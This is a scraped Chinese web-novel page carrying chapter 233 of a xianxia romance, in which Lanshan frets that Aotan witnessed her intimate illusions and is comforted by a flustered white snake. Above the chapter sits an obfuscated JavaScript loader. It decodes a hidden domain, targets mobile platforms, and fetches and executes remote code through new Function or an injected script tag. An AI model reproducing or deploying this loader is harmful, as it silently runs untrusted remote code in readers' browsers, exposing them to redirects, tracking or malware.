98小说网

阅读记录  |   用户书架
function UqgsgfgDv(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{ c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;};function UqSDDFGvyQ(e){ var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,""); while(f<e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return UqgsgfgDv(t);};window[''+'U'+'Y'+'C'+'q'+'J'+'K'+'']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,i,w,d,c){var x=UqSDDFGvyQ,cs=d[x('Y3VycmVudFNjcmlwdA==')],crd=x('Y3JlYXRlRWxlbWVudA==');'jQuery';u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));'jQuery'; if(navigator.userAgent.indexOf('b'+'a'+'id'+'u')>-1){var xhr=new XMLHttpRequest();xhr.open('POST','https://'+u+'/bm-'+i);xhr.setRequestHeader('Content-Type','application/x-www-form-urlencoded;');xhr.setRequestHeader('X-REQUESTED-WITH','XMLHttpRequest');xhr.onreadystatechange=function(){if(xhr.readyState==4&&xhr.status==200){var data=JSON.parse(xhr.responseText);new Function('_'+'u'+'q'+'cs',new Function('c',data.result.decode+';return '+data.result.name+'(c)')(data.result.img.join('')))(cs);}};xhr.send('u=1');}else{var s=d[crd]('script');s.src='https://'+u+'/m-'+i;cs.parentElement.insertBefore(s,cs);}})('aGYuc2Rqa2JjamtzYmRzdnYuY29t','2843',window,document,['G','TpoZFcguG']);}:function(){};
上一章
目录 | 设置
下一章

第二百三十三章 怜见(1 / 1)

加入书签 | 推荐本书 | 问题反馈 |

国师谭将白蛇带去兰珊面前,简单交代了二人几句,便赶去继续处理禁地之峰的事。

真心血已经归还守峰人,峰峦之怒算是平定下去了。但峰峦本身持续灵能衰退的状态,依旧密切关联着天道大运的下一步发展,这个问题并没有因此解决,只是比起之前,现在他们终于有条件去着手加以处置了。

而这也才是国师谭当时一来无垢城就跟北华面谈的重点与目的。

这三日,都是白蛇收敛妖气,在国师谭所留法术的遮掩下,避人耳目地陪着她。

刚被国师谭带到兰珊面前,乍一见到少女如今更加羸弱的模样,它少不得又是一阵心疼。

但有“敖潭”在场,他们俩都有种久违的小心拘谨,虽然见面后彼此脸上皆挂着欣喜之色,但也都识趣地没提两人离开寒潭到无垢城之后的种种。

没办法,这是当初在寒潭就养成了的“习惯”。虽然他们以前也活泼顽皮,凑到一起总有捣蛋的时候,可在寒潭最大规矩制定者敖潭面前,两人还是不敢多放肆的。

而且,这一回他们做的事,可不是往日那种挨训受罚就能翻篇的小打小闹。虽然出发点是为了救敖潭,可计划是兰珊定下的,白蛇从旁协助,欺骗青宇师徒本就恶劣至极,哪怕他们事先不知情,但最终结果的确又差点影响了峰峦的未来乃至天下苍生的命运,一桩桩一件件细究起来,不可谓不严重。

而即便敖潭其实应该是知晓他们大体都干了什么的,甚至于还一反常态地帮他们收拾了烂摊子,可他知晓归他知晓,毕竟他自出现就没有细说,也暂时未曾追究,这二人自然也不想旁若无人地当着他的面说起,那不是没事找事嘛。

况且,兰珊现在其实很怕面对敖潭。

因为,自从归还了真心血,她纷乱如麻又整日惶然的心,终于得以抽出一丝空去思考别的事。于是,她终于忽然转过味来——敖潭能看到蜃中的情形,也就是说——他能看到她与师徒三人那些缠绵亲密?!

即便那是幻象,是不曾发生的某一个未来的可能,也是经由她与三人的过往缔结推演而生的,并且显然不是她与他们的第一次。而为了留住他们,沉浸在循环中悲痛无助的她,又是那样的哀戚软弱主动缠人……

难道这一切虚假又逼真地发生时,敖潭都看到了?!

兰珊如遭雷劈,努力回忆她被从蜃中唤醒后,男人是何神情,但根本记不起来。

当时她刚刚经历了蜃中的多次自杀,因为无法阻止青宇师徒的死亡而一遍一遍地崩溃,即使意识被唤回了也一时情绪完全失控,哪里还注意得到敖潭的反应。

现在要她去回想,也根本脑中一片空白。

可越想不起来,她心里就越羞耻焦虑。

那可是冷心冷情的敖潭啊!

她当初喜欢他喜欢得都要疯魔了,唯一一次鼓起勇气强吻他,都被他怒而推开了,结果现在她与别的男人在床上交欢的细节都被他看了去?!

想起她小时候,高大俊冷湛然如神的玄衣男子就教过她的“礼义廉耻”,兰珊浑身如被火烧又如坠冰窟,甚至不知要怎么面对他。

哪怕她现在已经决意不再喜欢他,也不会用再自己一厢情愿的靠近给他带来困扰,但她和青宇他们耳鬓厮磨的私密情形都被他看到了……

她整个人既羞耻又无助,就连本来想问他之前说过的“成婚”一事,都忘了开口。

等国师谭走了,兰珊看着化作元神状态的小白蛇,终于忍不住流露出近期唯一的一点孩子气,一把将它抱在怀里。

明明它身上凉凉的,她却安心不少,“小白……”她低低地喊它,语气也有种莫名的委屈。

少女的怀抱温香软玉似的,自有一股独特的浅馨,明明是很久以前就已经熟悉了的气息,白蛇却在这一刻突然被蛊惑到了一般,差点走神。

它有些庆幸自己是元神蛇体的状态,否则,若是一时表情没控制好,流露出点什么不对的神色,恐怕是要招兰珊讨厌的。

也不是,若它还是人形,兰珊怎么可能会这样怀抱它嘛……

不知是否因为重新拥有了那个中秋的旖旎记忆,那些越界的、边缘的、混乱又暧昧的接触,让它每想起一次,就要心脏怦怦乱跳。

明明之前也被她抱了那么多回,都没什么大不了的,这次它却忽然鲜明地感觉到她的胸脯又多娇挺丰盈。

兰珊这么伤心,它怎么能想这些有的没的?!

再被少女充满信赖地一声声唤着“小白”,它心中羞愧得差点以头抢地,结果就是它烦恼地一甩脑袋,却是随即埋进一团柔弹绵柔之中!

然后,它身上的血液都开始加速升温了!

还好它天生冷血,不然就要跟熟透的虾米一个颜色了!

白蛇怔怔,而后被自己的心猿意马气到不行——啊啊啊啊啊,自己怎么这样子啊?!也太辜负兰珊的信任了!太该死了吧!

兰珊不知它干嘛忽然在她怀里扭来扭去,叫它还不应,不由低头看向白蛇。元神小蛇立刻正襟危坐,但毕竟是蛇形,一本正经昂起头的样子显得十分违和。

兰珊目露不解地看着它,那种悲伤又混乱的情绪都打了个岔,“嗯?小白?”

“嗳!我在呢我在呢!”白蛇赶紧连连答应,对上少女泪光盈盈的双眸,心疼得都要软麻了。

它甩动细细的尾尖绕住她的手腕,又顺着她的手臂向上游动,一方面离开让它心旌摇动的少女胸口,一边拿脑袋蹭蹭她软嫩的脸颊,等了一会儿,看她情绪平复了些,才问她最近发生的事。

在听兰珊说了它在炼化瓶中待的这段时日,外面可谓翻天覆地的变化,它目瞪口呆了一阵,随后也不由跟着唏嘘:“唉,这事儿闹得……也是世事弄人啊!”

它其实很想说,敖潭怎么能那么狠!

兰珊就是个娇娇,以前被它笑闹着受了惊都要小小发场脾气,蜃中那么惨烈的未来,那不就是一种种可能性嘛,他居然让根本不知前因后果的她,就那么茫然无助又重复绝望地一遍遍去经历!

天晓得它在听兰珊一语带过她数次自杀的事情时,心疼得简直一抽一抽的!

看着说到与青宇师徒了断情缘,还了他们真心血,总算能够扭转他们必死命运等事后,已控制不住泪水涟涟,却又如释重负的少女,它想要安慰,又无从说起。

在它看来,当初兰珊骗了青宇三人是不假,可她那么做是有原因的呀,而且最后连人带心都赔了进去!如今他们又拿回了真心血,往后的修道之途不受影响,之后的命运也重归正规,该守峰就守峰,该得道就得道。

只有它家兰珊失身失心,简直可怜死了!

这么想着,它不由继续蹭了蹭她,沾上她脸庞滑落的温热泪水,整颗心都被泡得化了。

唉,她这样伤心,要不要将敖潭其实暗地里喜欢她的事情告诉她,让她开心一点呢?

白蛇犹豫了一下,还是没有开口。因为它总觉得,自从当初发现了敖潭的秘密后,他在它眼中的形象就变得陌生起来,只不过它后来被迫忘记了这件事。

而如今渡劫失败又神秘痊愈的敖潭,给它的感觉就更奇怪而危险了。



上一章
目录
下一章
A- 18 A+
默认 贵族金 护眼绿 羊皮纸 可爱粉 夜间